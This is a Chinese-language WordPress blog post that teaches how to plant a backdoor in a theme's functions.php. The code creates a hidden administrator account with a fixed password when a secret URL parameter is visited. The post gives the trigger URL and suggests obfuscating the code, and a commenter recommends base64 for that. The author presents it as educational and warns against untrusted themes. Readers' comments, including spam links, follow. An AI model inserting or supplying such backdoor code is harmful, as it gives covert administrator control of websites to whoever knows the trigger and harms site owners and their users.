Kratos

A responsible theme for WordPress

如何在WordPress主题中创建后门

是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

 

add_action( ‘wp_head’, ‘my_backdoor’ );

function my_backdoor() {

if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

require( ‘wp-includes/registration.php’ );

if ( !username_exists( ‘backdoor’ ) ) {

$user_id = wp_create_user( ‘backdoor’, ‘pa55w0rd!’ );

$user = new WP_User( $user_id );

$user->set_role( ‘administrator’ );

}

}

}

比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

如果在把上面这段代码加密一下,很多用户就根本不知道这段代码是做什么的,所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。

点赞
  1. 神父说道:

    神一样的代码,妹啊

  2. 麦田一根葱说道:

    好无耻的后门啊啊啊

  3. 说道:

    原来就张这样见识了,加密的怎么说?

  4. 鳄鱼锅说道:

    果然涨姿势了

  5. Soar、毅说道:

    把你所有的收藏都交出来……

  6. 白内障说道:

    感觉个人博客需要好多技术来支持呀

  7. 我才是老蔡说道:

    要是有权限管理就好了

  8. 撸啊撸说道:

    兔爷你好,兔爷再见。

    1. maro说道:

      撸爷你好

  9. godaddy优惠码说道:

    看来下次一定要检查好了。

    1. Maro说道:

      base64就可以啊

  10. 头像贴吧说道:

    不要弄比较好吧。

  11. 哇,听了这个有点恐怖呀

  12. Meow Cold说道:

    真心涨姿势 话说怎么认识的都来了

  13. 北京seo说道:

    第一次来你博客哦,文章不错,赞一个。求认识啊,博主,求回访http://www.aiyw.net

  14. 歪妖内涵网说道:

    我不是来抢沙发的,也不是来打酱油的。

  15. 能交换各友情链接吗?我的网站是 爱奇趣 http://www.iqiqu.net/?

  16. 无节操图片说道:

    不错哦,赞一个。求认识,求回访

发表评论

电子邮件地址不会被公开。 必填项已用*标注